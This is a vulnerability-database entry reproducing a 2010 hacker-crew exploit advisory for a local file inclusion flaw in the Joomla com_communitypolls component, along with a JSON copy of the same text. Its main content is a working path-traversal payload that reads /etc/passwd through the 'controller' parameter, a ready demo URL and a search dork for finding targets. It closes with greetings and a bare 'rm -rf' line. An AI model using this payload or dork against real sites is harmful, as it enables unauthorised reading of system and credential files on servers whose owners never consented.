Search...

Joomla Component com_communitypolls LFI Vulnerability

2010-02-21T00:00:00

ID SSV:19161
Type seebug
Reporter Root
Modified 2010-02-21T00:00:00

Description

No description provided by source.

                                        
                                            
                                                [!]===========================================================================[!]
 
[~] Joomla Component com_communitypolls LFI Vulnerability
[~] Author  : kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage    : http://www.indonesiancoder.com
[~] Date    : 16 February, 2010
 
[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : http://www.corejoomla.com/
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:&quot;CIHUY&quot; ;)
[+] Download : http://www.corejoomla.com/downloads/community-polls/24-comcommunitypollsv1-5-2.html
[+] Version : 1.5.2 maybe lower also affected
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
 
http://127.0.0.1/index.php?option=com_communitypolls&amp;controller=[INDONESIANCODER]
 
[ XpL ]
 
../../../../../../../../../../../../../../../etc/passwd%00
 
[ d3m0 ]
 
http://server/index.php?option=com_communitypolls&amp;controller=../../../../../../../../../../../../../../../etc/passwd%00
 
 
etc etc etc ;]
 
[!]===========================================================================[!]
 
[ Thx TO ]
 
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
 
[ NOTE ]
 
[+] Rawk !
[+] rm -rf
 
[ QUOTE ]
 
[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] e0f

JSON Vulners Source

Initial Source

{"id": "SSV:19161", "type": "seebug", "bulletinFamily": "exploit", "title": "Joomla Component com_communitypolls LFI Vulnerability", "description": "No description provided by source.", "published": "2010-02-21T00:00:00", "modified": "2010-02-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.seebug.org/vuldb/ssvid-19161", "reporter": "Root", "references": [], "cvelist": [], "lastseen": "2017-11-19T18:14:29", "history": [], "viewCount": 1, "enchantments": {"vulnersScore": 4.3}, "enchantments_done": [], "objectVersion": "1.4", "sourceHref": "https://www.seebug.org/vuldb/ssvid-19161", "sourceData": "\n [!]===========================================================================[!]\r\n \r\n[~] Joomla Component com_communitypolls LFI Vulnerability\r\n[~] Author : kaMtiEz (kamzcrew@yahoo.com)\r\n[~] Homepage : http://www.indonesiancoder.com\r\n[~] Date : 16 February, 2010\r\n \r\n[!]===========================================================================[!]\r\n \r\n[ Software Information ]\r\n \r\n[+] Vendor : http://www.corejoomla.com/\r\n[+] Price : free\r\n[+] Vulnerability : LFI\r\n[+] Dork : inurl:"CIHUY" ;)\r\n[+] Download : http://www.corejoomla.com/downloads/community-polls/24-comcommunitypollsv1-5-2.html\r\n[+] Version : 1.5.2 maybe lower also affected\r\n \r\n[!]===========================================================================[!]\r\n \r\n[ Vulnerable File ]\r\n \r\nhttp://127.0.0.1/index.php?option=com_communitypolls&controller=[INDONESIANCODER]\r\n \r\n[ XpL ]\r\n \r\n../../../../../../../../../../../../../../../etc/passwd%00\r\n \r\n[ d3m0 ]\r\n \r\nhttp://server/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00\r\n \r\n \r\netc etc etc ;]\r\n \r\n[!]===========================================================================[!]\r\n \r\n[ Thx TO ]\r\n \r\n[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah\r\n[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack\r\n[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS\r\n[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk\r\n \r\n[ NOTE ]\r\n \r\n[+] Rawk !\r\n[+] rm -rf\r\n \r\n[ QUOTE ]\r\n \r\n[+] we are not dead INDONESIANCODER stil r0x\r\n[+] nothing secure ..\r\n[+] e0f\n ", "status": "poc", "_object_type": "robots.models.seebug.SeebugBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"]}